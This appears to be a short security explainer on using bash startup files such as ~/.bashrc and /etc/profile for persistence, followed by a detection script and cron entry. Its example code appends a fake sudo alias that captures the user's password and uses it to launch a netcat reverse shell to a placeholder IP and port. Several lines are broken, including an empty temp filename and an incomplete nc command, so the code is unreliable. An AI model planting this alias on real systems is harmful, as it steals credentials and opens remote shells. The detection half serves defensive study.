While changing your .bashrc and .bash_profile can be great to customize your bash experience, they can also be used as a persistence mechanism for an adversary. The following directories can be used for this persistence mechanism.
/etc/profile
/etc/bash.bashrc
~/.bashrc
~/.bash_profile
~/.profileYou can take the below example malicious code and add it to any of the above files above to have a bash shell callout to <ip> and <port>
Example Code:
<var>="<.hidden filename> "
cat << EOF > /tmp/
alias sudo='locale=$(locale | grep LANG | cut -d= -f2 | cut -d_ -f1);if [ \$locale = "en" ]; then echo -n "[sudo] password for \$USER: ";fi;read -s pwd;echo; unalias sudo; echo "\$pwd" | /usr/bin/sudo -S nohup nc -e /bin/bash > /dev/null && /usr/bin/sudo -S '
EOF
if [ -f ~/.bashrc ]; then
cat /tmp/ >> ~/.bashrc
fi
if [ -f ~/.zshrc ]; then
cat /tmp/ >> ~/.zshrc
fi
rm /tmp/<var>This can easily be detected by looking in these file locations for any additions or by using the following code to detect changes.
Example Detection Code:
#!/bin/bash
MIN=30
MOD=find ./ \( -cmin -$MIN -or -mmin -$MIN -or -amin -$MIN \) -name '~/.bashrc'
if [ -n "$MOD" ]; then
notify-send -u critical -t 0 -i /usr/share/icons/gnome/32x32/status/dialog-warning.png ".bashrc config file has been modified"
fi
#detect.sh
add cron job to check every 30 min
30 * * * * /bin/bash /<path>/detect.sh